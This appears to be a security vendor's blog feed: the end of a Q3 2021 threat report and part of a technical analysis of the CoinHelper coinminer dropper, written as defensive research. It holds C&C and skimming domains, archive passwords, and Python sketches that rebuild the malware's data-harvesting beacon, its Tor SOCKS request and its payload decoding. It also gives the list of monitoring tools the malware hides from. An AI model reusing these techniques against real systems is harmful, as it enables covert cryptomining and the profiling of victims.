The most prevalent group in Q3 2021, which we call GR2, typically targets European countries such as Russia, France, Ukraine, and Spain. These countries also had a high overall TSS risk ratio, together with Iceland, Uzbekistan, and Rwanda.

Below, we can see how GR2 was the most active TSS group, peaking in mid-July.

Alexej Savčin, Malware Analyst

Vulnerabilities and Exploits

Q3 saw plenty of newly discovered vulnerabilities. Of particular interest was PrintNightmare, a vulnerability in the Windows Print Spooler that allowed both local privilege escalation (LPE) and remote code execution (RCE). A Proof of Concept (PoC) exploit for PrintNightmare was leaked early on, which resulted in us seeing a lot of exploitation attempts by various threat actors. PrintNightmare was even integrated into exploit kits such as PurpleFox, Magnitude, and Underminer.

Another vulnerability worth mentioning is CVE-2021-40444. This vulnerability can either be used to create malicious Microsoft Office documents (which can execute malicious code even without the need to enable macros) or be exploited directly against Internet Explorer. We have seen both exploitation methods used in the wild, with a lot of activity detected shortly after the vulnerability became public in September 2021. One of the first exploit attempts we detected was against an undisclosed military target, which proves yet again that advanced attackers waste no time weaponizing promising vulnerabilities once they become public.

We’ve also been tracking exploit kit activity throughout Q3. The most active exploit kit was PurpleFox, against which we protected over 6k users per day on average. Rig and Magnitude were also prevalent throughout the whole quarter. The Underminer exploit kit woke up after a long period of inactivity and started sporadically serving HiddenBee and Amadey. Even though it might seem that exploit kits are becoming a thing of the past, we’ve witnessed that some exploit kits (especially PurpleFox and Magnitude) are being very actively developed, regularly receiving new features and exploitation capabilities. We’ve even devoted a whole blog post to the recent updates in Magnitude. Since that blog post, Magnitude continued to innovate and most interestingly was even testing exploits against Chromium-based browsers. We’ll see if this is the beginning of a new trend or just a failed experiment.

Figure: PurpleFox EK hits trendline

Overall, Avast users from Singapore, Czechia, Myanmar, Hong Kong and Yemen had the highest risk ratio for exploits, as can be seen on the following map.

The risk ratio for exploits grew throughout Q3, peaking in September.


Michal Salát, Threat Intelligence Director
Jan Vojtěšek, Malware Researcher

Web skimming 

Ecommerce websites are much more popular than they used to be; people shop online more and more often. This has led to the growth of an attack called web skimming.

Web skimming is a type of attack on ecommerce websites in which an attacker inserts malicious code into a legitimate website. The purpose of the malicious code is to steal payment details on the client side at the moment the customer fills in the payment form. The stolen payment details are usually sent to the attacker’s server. To make the data flow to a third-party resource less visible, fraudsters often register domains resembling the names of popular web services like google-analytics, mastercard, paypal, and others.
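One way defenders can spot such look-alike domains is fuzzy matching against a brand watchlist; a minimal sketch (the watchlist, threshold, and sample domain are illustrative, not from our detection logic):

```python
def levenshtein(a, b):
    """Classic dynamic-programming edit distance between two strings."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,            # deletion
                           cur[j - 1] + 1,         # insertion
                           prev[j - 1] + (ca != cb)))  # substitution
        prev = cur
    return prev[-1]

BRANDS = ["google-analytics", "mastercard", "paypal"]  # illustrative watchlist

def looks_like_brand(domain, max_distance=1):
    """Flag a domain whose first label is within a small edit distance
    of a watched brand name."""
    label = domain.split(".")[0].lower()
    return any(levenshtein(label, b) <= max_distance for b in BRANDS)

print(looks_like_brand("paypa1.com"))   # True: one edit away from "paypal"
print(looks_like_brand("example.com"))  # False
```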

The map below shows that users from Australia, the United States, Canada, Brazil and Argentina were most at risk in Q3. Of the smaller countries, we can see Guatemala and Slovenia at the top. The high risk ratio in Guatemala was caused by an infected eshop, elduendemall[.]com.

Web skimming hits and trendline

The top two malicious domains used by attackers were webadstracker[.]com and ganalitics[.]com. Webadstracker[.]com has been blocked by Avast since 2021-03-04 and remained active for the whole of Q3. This indicates that, unlike phishing sites, which are usually active for only a couple of days, web skimming domains can remain active much longer. Webadstracker[.]com is hosted on Flowspec, which is known as one of the bulletproof hosting providers. Of all the web skimming incidents we observed, 8.6% involved this domain. Through this domain, we can link other domains on the same IP which were also used for web skimming attacks in Q3:

  • webscriptcdn[.]com
  • cdncontainer[.]com
  • cdnforplugins[.]com
  • shoppersbaycdn[.]com
  • hottrackcdn[.]com
  • secure4d[.]net

We were able to link this IP ( with 75 infected eshops. Lfg[.]com[.]br was the top ecommerce website infected with webadstracker[.]com in Q3.

Pavlína Kopecká, Malware Analyst


Open Firebase instances

Firebase is Google's mobile and web app development platform. Developers can use Firebase to facilitate the development of mobile and web apps, especially for the Android mobile platform. In our study, we discovered that more than 10% of roughly 180,000 tested Firebase instances used by Android apps were open. The reason is a misconfiguration made by application developers. Some of these DBs exposed sensitive data, including plaintext passwords, chat messages, etc. These open instances pose a significant risk of users' data leaking. Unfortunately, ordinary users can't check whether the DB used by an application is misconfigured; moreover, it can become open at any moment.

Vladimir Martyanov, Malware Researcher


Adware

Adware continues to be a dominant threat on Android. This category may take various forms – from traditional aggressive advertising in either legitimate or even fake applications, to completely fake applications that, while installed with the original purpose of stopping adware, end up doing exactly the opposite and bombard the user with out-of-context ads (for example FakeAdBlocker).

The degree to which the aggressive advertisement is shown to the user, either in-app or out of context, very negatively affects the user's experience. Moreover, in the case of out-of-context ads, the user has a very difficult time actually locating the source of such spam.

A special category in this regard is the so-called Fleeceware, which we have been observing on both iOS and Android for quite some time. This type of threat was still present in the official marketplaces in Q3, and users should be aware of such techniques so that they can actively avoid falling for them.

Ondřej David, Malware Analysis Team Lead

Bankers – FluBot

We have seen a steady increase in the number of mobile banking threats for a while now, but never more than in Q3 2021. This can best be evidenced by a strain called FluBot – while this strain has been active since Q1/Q2, we've seen it make a couple of rounds since then. By Q3 it had become an established threat in the Android banking threat landscape.

Its advanced and highly sophisticated spreading mechanisms – using SMS messages typically posing as delivery services to lure victims into downloading a "tracking app" for a parcel they recently missed or should be expecting – as well as its relentless campaigns make for a successful strain in the field. But even these phishing SMS messages (aka smishing) have evolved, and especially in Q3 we saw novel scenarios for spreading this malware. One example is posing as voicemail recorders. Another is fake claims of leaked personal photos. The most extreme of these variants would even lure the victim to a fake page claiming the victim had already been infected by FluBot (when they probably weren't yet) and trick them into installing a "cure" for the "infection". This "cure" would in fact be the FluBot malware itself.

We have seen a steady expansion of the scope of FluBot's operations throughout Q2 and mainly Q3. Initially it targeted Europe – Spain, Italy, Germany – later spreading throughout the rest of the continent, but it didn't end there. In Q3 we've seen advisories being posted in many other countries, including Australia and New Zealand. This threat affects only Android devices – iOS users may still occasionally receive the phishing SMS messages, but the malware is not able to infect their devices.

The heat map below shows the spread of Flubot in Q3 2021 and the graph shows the increase in Flubot infections in that same time period.

FluBot hits and trendline

Ondřej David, Malware Analysis Team Lead


Perhaps the most discussed mobile threat in Q3 was the infamous Pegasus spyware. Developed by Israel's NSO Group, this threat primarily targeted iOS device users, with known Android variants as well. Due to the usage of zero-click vulnerabilities in the iMessage application, the attackers were able to infect a device without any user interaction, which makes it a particularly tricky and sophisticated threat to deal with. Fortunately for the majority of users, this type of attack is unlikely to be used on a mass scale; rather, it is used in a highly targeted manner against high profile or high value targets.

Acting as a full-blown spyware suite, Pegasus is capable of tracking location, calls, messages and many other types of personal data. Pegasus as a strain is not exactly new; its roots go as far back as at least 2016. However, the threat, as well as its distribution methods, has changed significantly since the early days. For successful stealthy distribution of this threat, the malicious actors needed to keep finding vulnerabilities in the ever-updating OS or default apps that could be used as a way to infect the device – ranging from remote jailbreaks to the latest versions utilizing zero-click exploits.

The best protection against this type of threat is to keep your mobile device's operating system updated to the latest version and have all the latest security updates installed.

Ondřej David, Malware Analysis Team Lead

Acknowledgements / Credits

Malware researchers
  • Adolf Středa
  • Alexej Savčin
  • Anh Ho
  • Daniel Beneš
  • David Jursa
  • Igor Morgenstern
  • Jakub Kaloč
  • Jakub Křoustek
  • Jan Rubín
  • Jan Vojtěšek
  • Luigino Camastra
  • Martin Chlumecký
  • Martin Hron
  • Michal Salát
  • Ondřej David
  • Pavlína Kopecká
  • Samuel Sidor
  • Vladimir Martyanov
Data analysts
  • Lukáš Zobal
  • Pavol Plaskoň
  • Petr Zemek
  • Christopher Budd
  • Marina Ziegler

The post Avast Q3’21 Threat Report appeared first on Avast Threat Labs.

Toss a Coin to your Helper (Part 2 of 2)

1 December 2021 at 14:26

In the first post of this series, we looked at a clipboard stealer belonging to the MyKings botnet. In this second part of the blog series, we will discuss in detail a very prevalent malware family of AutoIt droppers that we call CoinHelper, used in a massive coinmining campaign. Since the beginning of 2021, Avast has protected more than 125,000 users worldwide from this threat. CoinHelper is mostly bundled with cracked software installers, such as WinRAR, and game cheats.

Regarding game cheats, we’ve seen this bundling with some of the most popular and famous games out there including (but not limited to): Extrim and Anxious (Counter-Strike Global Offensive cheats), Cyberpunk 2077 Trainer (Cyberpunk 2077 cheat), PUBG and CoD cheats, and Minecraft. We’ve also found this threat inside a Windows 11 ISO image from unofficial sources (as we indicated on Twitter). We have even seen this threat bundled with clean software such as Logitech drivers for webcams. All in all, we have seen CoinHelper bundled with more than 2,700 different software so far, including games, game cheats, security software, utilities, clean and malware applications alike.

Our research led us here because we also saw these droppers spread via MyKings' clipboard stealer payload, as described in the previous part of this blog series. Nevertheless, we can't attribute CoinHelper to the MyKings botnet; on the contrary, based on the number of different infection sources, we believe that CoinHelper used MyKings' clipboard stealer merely as an additional malware delivery channel.

We have found some mentions of these AutoIt droppers in other blog posts from last year. One of the most notable instances was detailed by Trend Micro, describing a sample of the AutoIt dropper bundled with Zoom communicator (downloaded from an unofficial source) which happened in the early days of the COVID-19 pandemic when millions of new users were flocking to Zoom. Another instance is in a post from Cybereason mentioning a new dropper for XMRig miners.

In this blog post, we analyze the latest version of CoinHelper in detail, discuss the malware campaign, describe all its components as well as research into what applications are most often bundled with the malware and show how the malware spreads. We also outline some of the data harvesting that it performs on infected systems to map the infected victims.

Campaign overview

Since the beginning of 2020, we have seen more than 220,000 attempts to infect our users with CoinHelper, most of them being in Russia (83,000). The second most targeted country is Ukraine with more than 42,000 attacked users.

Map illustrating the targeted countries since the beginning of 2020

Monetary gain

One of the primary goals of CoinHelper is to drop a crypto miner on the infected machine and use the resources (electricity and computing power) of the victim’s computer to generate money for the attackers through mining.

Even though we observed multiple cryptocurrencies being mined, including Ethereum and Bitcoin, one in particular stood out – Monero. Of the total of 377 crypto wallet addresses we extracted from the malware, 311 mined Monero through crypto mining pools. The reasons for criminals to choose Monero are quite obvious. Firstly, this cryptocurrency was created and designed to be private and anonymous. This means that tracing the transactions, the owners of the accounts, or even the amounts of money that were stolen and/or mined can be quite difficult. Secondly, this cryptocurrency has a good value at this time – you can exchange 1 XMR for ~$240 USD (as of 2021-11-29).

Even though Monero is designed to be anonymous, thanks to the wrong usage of addresses and the mechanics of how mining pools work, we were able to look more into the Monero mining operation of the malware authors and find out more about how much money they were able to gain.

To ensure more regular income, the miners were configured to use Monero mining pools. Mining pools are often used by miners to create one big and powerful node of computing power that works together to find a suitable hash and collect a reward for it. Because the search for a suitable hash is random, the more guesses you make, the bigger your chance of success. In the end, when the pool receives a reward, the money is split between the members of the pool depending on their share of the work. Using pools is very convenient for malware authors: it gives them a greater chance to successfully mine cryptocurrency in the limited time they have before their miners are discovered and eradicated.

In total, we registered 311 Monero addresses used in the configuration of the miners dropped by the AutoIt droppers. These addresses were used in more than 15 different Monero mining pools, and our data and research confirm that the mining campaign is even bigger, with many of the addresses used across multiple pools. After diving deeper into the data that the pools offer, we can confirm that, as of 2021-11-29, the authors gained more than 1,216 XMR solely by crypto mining, which translates into over $290,000 USD.

Apart from the Monero addresses, we also registered 54 Bitcoin addresses and 5 Ethereum addresses. After looking at these addresses, we can conclude that they received the following amounts of money:

Cryptocurrency Earnings in USD Earnings in cryptocurrency Number of wallets
Monero $292,006.08 1,216.692 [XMR] 311
Bitcoin $46,245.37 0.796 [BTC] 54
Ethereum $1,443.41 0.327 [ETH] 5
Table with monetary gain (data refreshed 2021-11-29)

This makes the total monetary gain of this malware $339,694.86 USD as of 2021-11-29. The amounts in the table above are the total incomes of the Bitcoin and Ethereum wallets, so we can't exclude the possibility that some part of the money comes from activities other than mining, but we assume that even those activities would be malicious. As can be seen from the data we collected, the major focus of this campaign is on mining Monero, where the attackers used ~5 times more wallet addresses and gained ~6 times more money.

Technical analysis

Dropping the payload

Let’s continue straight away where we left off in the previous part. As we learned, the clipboard stealer could swap copy+pasted wallet addresses in the victim’s clipboard, as well as swap other links and information depending on the malware’s configuration. One of these links was https://yadi[.]sk/d/cQrSKI0591KwOg.

After downloading and unpacking the archive (with the password gh2018), a new sample, Launcher.exe, is dropped (c1a4565052f27a8191676afc9db9bfb79881d0a5111f75f68b35c4da5be1f385). Note that this approach is very specific to the MyKings clipboard stealer and requires user interaction. In other, and more common, cases the user obtains a whole bundled installer from the internet, unintentionally executing the AutoIt dropper during the installation of the expected software.

This sample is the first stage of a compiled AutoIt script, a dropper that we call CoinHelper, which provides all necessary persistence, injections, checking for security software along the way, and of course downloading additional malware onto the infected machine.

Although this sample contains almost all of the latest functionality of these AutoIt droppers, it is not the latest version and some features are missing. For that reason, we decided to instead take a newer (but very similar) version of the dropper, with SHA256 83a64c598d9a10f3a19eabed41e58f0be407ecbd19bb4c560796a10ec5fccdbf, and thoroughly describe all of its functionality in one place.

Overview of the infection chain

Exploring the first stage

Let's dive into the newer sample. This one usually lands on users' machines under the name start.exe and carries a Google Chrome icon. Upon closer look, it is apparent that this is a compiled AutoIt binary.

After extracting the AutoIt script from the sample we can see additional components:

  • asacpiex.dll
  • CL_Debug_Log.txt
  • glue\ChromeSetup.exe

CL_Debug_Log.txt is a clean standalone executable of 7zip and asacpiex.dll is a damaged (modified) 7zip archive carrying the second stage of the malware. Soon, we will fix this archive and look inside as well, but first, let's focus on the extracted AutoIt script. The last binary from the list above, placed in the glue folder, is one of the many possible apps bundled inside CoinHelper. In this case, it is a clean setup installer of the Chrome browser. If you are interested in seeing what other applications are usually bundled with CoinHelper, see Bundled apps overview for details.

Rude welcome

The AutoIt script is actually very readable. Perhaps even too readable, looking at the vulgarity at the beginning. Note that Region / EndRegion is a SciTE text editor feature to mark code regions. In this case, however, the script starts with the EndRegion clause, and some well-known AutoIt decompilers, such as Exe2Aut (v0.10), struggle with this and are unable to decompile the script, effectively displaying just the rude welcome. Note that myAut2Exe (v2.12), for example, has no issues with the decompilation.

We can also see here the beginning of the malware's configuration, first checking for the existence of a mutex QPRZ3bWvXh (a function called _singleton), followed by the scheduled task configuration. As shown in the code above, the SystemCheck scheduled task presents itself as a Helper.exe application from Microsoft. However, Microsoft doesn't provide any tool with such a name. The scheduled task is used for executing the malware persistently.

The modification of the asacpiex.dll archive was done by nulling out the first five bytes of the file, which can easily be restored to the usual 7zip archive header: 37 7A BC AF 27. The script actually replaces even more bytes, but that is not necessary.
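As a rough illustration, restoring the signature takes only a few lines of Python. This is a sketch under our own naming, not code from the sample; the dummy data below stands in for the real archive contents.

```python
# Sketch: restore the nulled 7zip signature of a damaged archive such as
# asacpiex.dll. The damaged file has its first five bytes zeroed out;
# writing back the standard 7z signature (37 7A BC AF 27) makes the
# archive readable again.

SEVENZIP_MAGIC = bytes.fromhex("377ABCAF27")

def fix_7z_header(damaged: bytes) -> bytes:
    """Return a copy of the archive with the first five bytes restored."""
    return SEVENZIP_MAGIC + damaged[len(SEVENZIP_MAGIC):]

# Example: a dummy "damaged" archive with a zeroed-out signature.
damaged = b"\x00" * 5 + b"...rest of archive..."
fixed = fix_7z_header(damaged)
assert fixed.startswith(b"7z\xbc\xaf\x27")  # b"7z" == \x37\x7a
```

The repaired bytes can then be written out and unpacked with a regular 7zip binary and the password mentioned below.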

Before we dive into the contents extracted from the archive (a keen eye already spotted that the password is JDQJndnqwdnqw2139dn21n3b312idDQDB), let’s focus on the rest of this script. We will continue with the unpacking of asacpiex.dll in the Exploring the second stage section.

In the code above, we also see that ChromeSetup.exe is placed into the glue folder. This folder (sometimes called differently, e.g. new) contains the original application with which the malware was bundled together. In our analysis we are showing here, this is a clean installer of the Chrome browser that is also executed at this stage to preserve the expected behavior of the whole bundle.

We encountered many different applications bundled with CoinHelper. Research regarding these bundles is provided in a standalone subsection Bundled apps overview.

Mapping the victims

In addition to fixing the damaged archive, executing the second stage, and ensuring persistence, the first stage holds one additional functionality that is quite simple, but effective.

The malware uses public services, such as IP loggers, to aggregate information about victims. The IP loggers are basically URL shorteners that usually provide comprehensive telemetry statistics over the users clicking on the shortened link.

Additionally, as we will see further in this blogpost, the attacker harvests information about victims, focusing on the victim’s OS, amount of RAM installed, the CPU and video card information, as well as the security solutions present on the system. All the collected information is formatted and concatenated to a single string.

This string is then sent to a hardcoded URL address in the form of a user-agent via GET request. In our sample, the hardcoded URL looks like https://2no[.]co/1wbYc7.

Note that URLs such as these are sometimes used in the second stage of CoinHelper as well. In our dataset, we have found 675 different URLs to which the malware sends data.
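To make the mechanism concrete, here is a minimal Python sketch of such a beacon. The URL and the harvested values are illustrative placeholders (the real sample builds the string in AutoIt and uses a hardcoded IP-logger URL):

```python
# Sketch: harvested system details are concatenated into one string and
# smuggled out as the User-Agent header of a plain GET request to a
# hardcoded IP-logger URL. All values below are placeholders.
import urllib.request

def build_beacon(url: str, harvested_fields: list) -> urllib.request.Request:
    """Pack the harvested data into the User-Agent of a GET request."""
    user_agent = " | ".join(harvested_fields)
    return urllib.request.Request(url, headers={"User-Agent": user_agent})

req = build_beacon(
    "https://example.invalid/1wbYc7",
    ["Windows 10 x64", "16 GB RAM", "Intel CPU", "NVIDIA GPU", "no AV found"],
)
# urllib.request.urlopen(req) would actually send the beacon;
# here we only build the request and inspect it.
print(req.get_header("User-agent"))
```

Because the IP logger records the User-Agent alongside the visitor's IP and geolocation, this single request is enough to populate the attacker's statistics.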

Because the attackers often use public services without authentication, we can actually peek inside and see the statistics from their perspective. The bottom line is that they are making a statistical evaluation of their various infection vectors (bundled installers from unofficial software sources, torrents, the MyKings botnet, and more) across the infected user base, effectively trying to focus on people with higher-end machines, as well as getting to know which regions in the world use which antivirus and/or security solutions.

As an example, we can see information available on one of the many still-active links containing a date and time of the click, IP address (anonymized) and ISP, corresponding geolocation, used web browser and of course, the user-agent string with the harvested data.

Attacker’s view on the infected victims (black squares are anonymized IP addresses)

The attacker also has access to the geographic location of the victims in a map view.

Attacker’s view on the geographic information of the infected victims

In the sections below, the reader can find further details of how the information is obtained in the first stage of the malware, along with further details about the harvested data.

Checking the CPU 

The malware executes one of two shellcode variants (x86 and x64), present in hexadecimal form:

  • 0x5589E5538B45088B4D0C31DB31D20FA28B6D10894500895D04894D0889550C5B5DC3
  • 0x5389C889D131DB31D20FA26741890067418958046741894808674189500C5BC3

When we disassemble the shellcodes, we can see common cpuid checks, returning all of their output values (registers EAX, EBX, ECX, EDX). Thus, the malware effectively harvests all available information about the victim's processor, including its model and features.

x86 CPUID check
x64 CPUID check

All the information is parsed and particular features are extracted. The feature lists in the malware are actually identical to those on the CPUID Wikipedia page, revealing exactly where the attacker found their inspiration.

Even though all the information is harvested, only the AES instruction set bit is actually checked: only if the processor supports this instruction set and is x64 will the malware install the x64 version of the final stage (the coinminer). Otherwise, the x86 version is used.

As we mentioned, the rest of the information is collected, but it is actually not used anywhere in the code.
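For illustration, the decision boils down to a single bit: for CPUID leaf 1, the AES-NI flag is reported in bit 25 of ECX (the same layout as on the CPUID Wikipedia page the authors copied from). A minimal Python sketch of this logic, with function names of our own choosing:

```python
# Sketch: the only CPUID-derived decision the dropper actually makes.
AES_NI_BIT = 1 << 25  # ECX bit 25, CPUID leaf 1 = AES-NI support

def pick_miner_arch(ecx_leaf1: int, is_64bit_os: bool) -> str:
    """Mirror the dropper's logic: x64 miner only with AES-NI on a 64-bit OS."""
    if (ecx_leaf1 & AES_NI_BIT) and is_64bit_os:
        return "x64"
    return "x86"

# Example: an ECX value with the AES bit set, on a 64-bit machine.
print(pick_miner_arch(0x7FFAFBFF, True))  # -> x64
```

Everything else the shellcode collects is carried along in the beacon string but never influences the control flow.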

CPU and video card information

The cpuid check is not the only one that performs HW checks on the victim’s system. Two additional WMI queries are used to obtain the names of the victim’s processor and video card:
SELECT * FROM Win32_Processor
SELECT * FROM Win32_VideoController

Furthermore, the malware uses GetSystemInfo to collect the SYSTEM_INFO structure to check the number of cores the victim’s CPU has.

AV checks

The script also checks for running processes, searching for security solutions present on the machine. This information is once again “just” logged and sent to the IP logging server – no other action is done with this information (e.g. altering malware’s functionality).

The complete list of all the checked AV / Security solutions by their processes, as presented in the malware, can be found in Appendix.

Exploring the second stage – asacpiex.dll

Now, let’s dive into the second stage of the malware. After the asacpiex.dll archive is fixed, it is saved as CR_Debug_Log.txt to the Temp folder.

To unpack the archive, the malware uses a password JDQJndnqwdnqw2139dn21n3b312idDQDB. This is the most common password for these AutoIt droppers. However, it is not the only one and so far, we counted two additional passwords:

Unpacking reveals two additional files:

  • 32.exe
  • 64.exe

Depending on the architecture of the OS and whether the AES instruction set is available, one of these files is copied into
and executed (via a scheduled task).

Both of these files are once again compiled AutoIt scripts, carrying functionality to distribute further payloads, in the form of coinminers, to victims via the Tor network.

After decompiling the files, we can see that both of the output scripts are very similar. The only difference is that the x64 version, where possible, also tries to utilize the user's graphics card for coinmining, not just the CPU. In the text below, we will focus on the x64 version since it contains more functionality.

Although Helper.exe is the most common name of the malware by far, it is not the only possibility. Other options we’ve seen in the wild are for example:

  • fuck.exe
  • Helperr.exe
  • svchost.exe
  • System.exe
  • system32.exe
  • WAPDWA;DJ.exe
  • WorkerB.exe


As we already mentioned, the primary goal of the Helper.exe dropper is to drop an XMRig coinminer onto the victim's system via the Tor network. The coinminer is executed with a hardcoded configuration present in the script.

Helper.exe holds a variety of other functionalities as well, such as performing several system checks on the victim’s PC, injecting itself into %WINDIR%\System32\attrib.exe system binary, checking the “idleness” of the system to intensify the mining, and more. Let’s now have a look at how all these functionalities work.

Downloading coinminers via Tor network

The main purpose of the dropper is to download a payload, in our case a coinminer, onto the infected system. To do so, the malware performs several preparatory actions to set up the environment to its needs.

First and foremost, the malware contains two additional files in hexadecimal form. The first is once again a clean 7zip binary (but a different one than CL_Debug_Log.txt) and the second is a 7zip archive containing a clean Tor binary and its accompanying libraries:

  • libcrypto-1_1-x64.dll
  • libevent-2-1-7.dll
  • libevent_core-2-1-7.dll
  • libevent_extra-2-1-7.dll
  • libgcc_s_seh-1.dll
  • libssl-1_1-x64.dll
  • libssp-0.dll
  • libwinpthread-1.dll
  • tor.exe
  • zlib1.dll

To be able to unpack Tor, the password DxSqsNKKOxqPrM4Y3xeK is required. This password is also required for unpacking every downloaded coinminer, but we will get to that later.

After Tor is executed, it listens on port 9303 on localhost ( and waits for requests. To prevent confusion at this point, note that this execution is hidden by default and that tor.exe should not be mistaken for the Tor browser; tor.exe is a process providing Tor routing (without a GUI). In a common Tor browser installation, it can usually be found in \<Tor browser root folder>\Browser\TorBrowser\Tor\tor.exe.

The script further contains a few Base64 encoded Tor addresses of the C&C servers and tests which one is alive. This is done by initializing SOCKS4 communication via a crafted request (in hexadecimal form):
04 01 00 50 00 00 00 FF 00 $host 00
where $host is the demanded server address.

The malware expects one of the standard protocol responses, and only if the response contains the 0x5A byte will it proceed to communicate with the server.

Byte Meaning
0x5A Request granted
0x5B Request rejected or failed
0x5C Request failed because client is not running identd (or not reachable from server)
0x5D Request failed because client’s identd could not confirm the user ID in the request
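A minimal Python sketch of this handshake; the builder and checker function names are our own, and a real client would of course send the bytes to over a socket:

```python
# Sketch: build the SOCKS4a CONNECT request described above
# (04 01 <port> 00 00 00 FF 00 <host> 00) and check the proxy's reply.

def socks4a_connect_request(host: str, port: int = 80) -> bytes:
    """Build the request the dropper sends to the local Tor SOCKS port."""
    return (
        b"\x04\x01"                       # SOCKS version 4, command CONNECT
        + port.to_bytes(2, "big")         # destination port
        + b"\x00\x00\x00\xFF"             # invalid IP -> SOCKS4a hostname mode
        + b"\x00"                         # empty user ID, null-terminated
        + host.encode("ascii") + b"\x00"  # hostname, null-terminated
    )

def request_granted(response: bytes) -> bool:
    """Reply format: VN, CD, 2-byte port, 4-byte IP; CD == 0x5A means granted."""
    return len(response) >= 2 and response[1] == 0x5A

req = socks4a_connect_request("example.onion")
assert req.hex().startswith("04010050000000ff00")
```

Putting the placeholder IP 0.0.0.255 in the address field is what tells the proxy to resolve the trailing hostname itself, which is exactly what is needed for .onion addresses.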

The lists of Tor addresses differ quite a bit across multiple samples. So far we’ve seen 24 unique C&C servers (see our IoC repository for the complete list). However, at the time of writing, only two of all the servers were still active:

  • 2qepteituvpy42gggxxqaaeozppjagsu5xz2zdsbugt3425t2mbjvbad[.]onion
  • jbadd74iobimuuuvsgm5xdshpzk4vxuh35egd7c3ivll3wj5lc6tjxqd[.]onion

If we access the server using e.g. the Tor browser, we can see a default Windows Server landing page, illustrated in the figure below. Note that this is a very common landing page for MyKings C&Cs. However, this single fact is not sufficient for attributing CoinHelper to MyKings.

Default Windows Server landing page. The same image is also commonly present on MyKings C&C servers, but that is not sufficient for attribution.

The malware is capable of downloading four files in total from an active server, present in a “public” subfolder:

  • public/upd.txt
  • public/64/64.txt (or public/32/32.txt if the “32 bit variant” of the script is used)
  • public/vc/amd.txt
  • public/vc/nvidia.txt

The files 64.txt (32.txt), amd.txt, and nvidia.txt are all XMRig coinminers (encoded and compressed), for either the CPU or the corresponding GPU.

The upd.txt file is a plaintext file containing a version number bounded by _ and ! symbols, for example _!1!_. The malware asks the server for this version, and if it is newer, all coinminers are updated (downloaded again).

The miners are downloaded as a hexadecimal string from the C&C, ending with a constant string _!END!_. After the end stub is removed and the string decoded, we get a 7zip archive. Once again, we can use the DxSqsNKKOxqPrM4Y3xeK password to unpack it.
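A small Python sketch of this decoding step; the function name is ours, and unpacking the resulting 7zip archive with the password is left out:

```python
# Sketch: strip the _!END!_ stub from the hex string served by the C&C,
# decode it, and check the 7zip signature before unpacking.
import binascii

END_STUB = "_!END!_"

def decode_payload(raw: str) -> bytes:
    """Turn the C&C's hex blob into the raw bytes of a 7zip archive."""
    hex_data = raw.strip().removesuffix(END_STUB)
    return binascii.unhexlify(hex_data)

# Example with a dummy blob; real payloads start with 37 7A BC AF 27.
blob = decode_payload("377abcaf27" + END_STUB)
assert blob.startswith(bytes.fromhex("377ABCAF27"))
```

After this step, the same DxSqsNKKOxqPrM4Y3xeK password opens the archive and yields the "SysBackup" files described below.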

After the unpacking, we can get these files:

  • SysBackup.txt – for CPU miners (both 32 and 64 bit)
  • SysBackupA.txt – when there is also AMD GPU detected
  • SysBackupN.txt – when there is also NVIDIA GPU detected

These files are once again present in hexadecimal form, this time starting with a 0x prefix and without the end stub.

Furthermore, a few additional files can be found alongside the "SysBackup" files, ensuring the mining functionality and optimal mining where appropriate (for example, xmrig-cuda.dll for NVIDIA cards).

The download process can be seen in the following visualisation:


The coinmining (and the 7zip unpacking) is executed via process injection. The CPU coinmining is performed by injecting into a newly created and suspended process of %WINDIR%\System32\attrib.exe.

Execution of all the other components, such as GPU mining or the unpacking of the coinminer payloads downloaded via Tor, is done by injecting into itself, meaning a new suspended instance of Helper.exe is used for the injection. When GPU coinmining is supported, both CPU and GPU mining run in parallel.

Note that the injection is done by a publicly available AutoIt injector, so the author chose the copy+paste way without reinventing the wheel.

From our research, we've only seen XMRig deployed as the final coinmining payload. The malware executes it with common parameters, with one approach worth mentioning: the parameter setting the password for the mining server, "-p". In standard situations the password doesn't really matter, so malware authors usually use "x". In this case, however, the malware generates a GUID of the victim and appends it to the usual "x".

The GUID is created by concatenating values from one of the WMI queries listed below:
SELECT * FROM Win32_ComputerSystemProduct
SELECT * FROM Win32_Processor
SELECT * FROM Win32_PhysicalMedia

Which query should be used is defined in the configuration of the AutoIt script. The GUID is created by hashing the obtained information using MD5 and formatted as a standard GUID string:

With this approach, the malware author is in fact able to count the exact number of infected users who are actually mining, because each victim mines with a unique password, passed to the pool as the ID of the "worker" (= victim).
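A Python sketch of this GUID scheme follows. The exact casing and the WMI string below are our assumptions, since the sample only specifies MD5 hashing of the WMI query output and standard GUID formatting:

```python
# Sketch: hash the concatenated WMI output with MD5 and reformat the 32 hex
# digits as a GUID, which is then appended to XMRig's "-p x" password.
import hashlib

def victim_guid(wmi_output: str) -> str:
    """MD5 of the WMI data, laid out as a standard 8-4-4-4-12 GUID string."""
    h = hashlib.md5(wmi_output.encode()).hexdigest().upper()
    return f"{h[:8]}-{h[8:12]}-{h[12:16]}-{h[16:20]}-{h[20:]}"

def xmrig_password(wmi_output: str) -> str:
    """The value passed to XMRig's -p parameter: the usual "x" plus the GUID."""
    return "x" + victim_guid(wmi_output)

# The WMI string is an illustrative placeholder.
print(xmrig_password("Win32_ComputerSystemProduct: ExampleVendor ExampleModel"))
```

Because pools display per-worker statistics keyed by this value, the same GUID doubles as a stable per-victim identifier across mining sessions.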


Similarly to the first stage, at the beginning of the second stage, particular mutexes are checked and created if necessary:

  • QPRZ1bWvXh
  • QPRZ1bWvXh2

As we can see, only the number in the middle of the mutex is changed compared to the first stage (QPRZ3bWvXh). The second mutex has a constant 2 appended. We have also seen QPRZ2bWvXh used, once again changing the middle number.

For the sake of staying hidden as long as possible, the malware uses the native AutoIt ProcessExists function to check for any running system monitoring and analysis tools:

  • aida64.exe
  • AnVir.exe
  • anvir64.exe
  • GPU-Z.exe
  • HWiNFO32.exe
  • HWiNFO64.exe
  • i7RealTempGT.exe
  • OpenHardwareMonitor.exe
  • pchunter64.exe
  • perfmon.exe
  • ProcessHacker.exe
  • ProcessLasso.exe
  • procexp.exe
  • procexp64.exe
  • RealTemp.exe
  • RealTempGT.exe
  • speedfan.exe
  • SystemExplorer.exe
  • taskmgr.exe
  • VirusTotalUpload2.exe

When such a tool is spotted, the malware temporarily disables the mining. The information about running coinminers is stored in two files:


As their names suggest, the PID of the running (GPU) coinminer is written there.

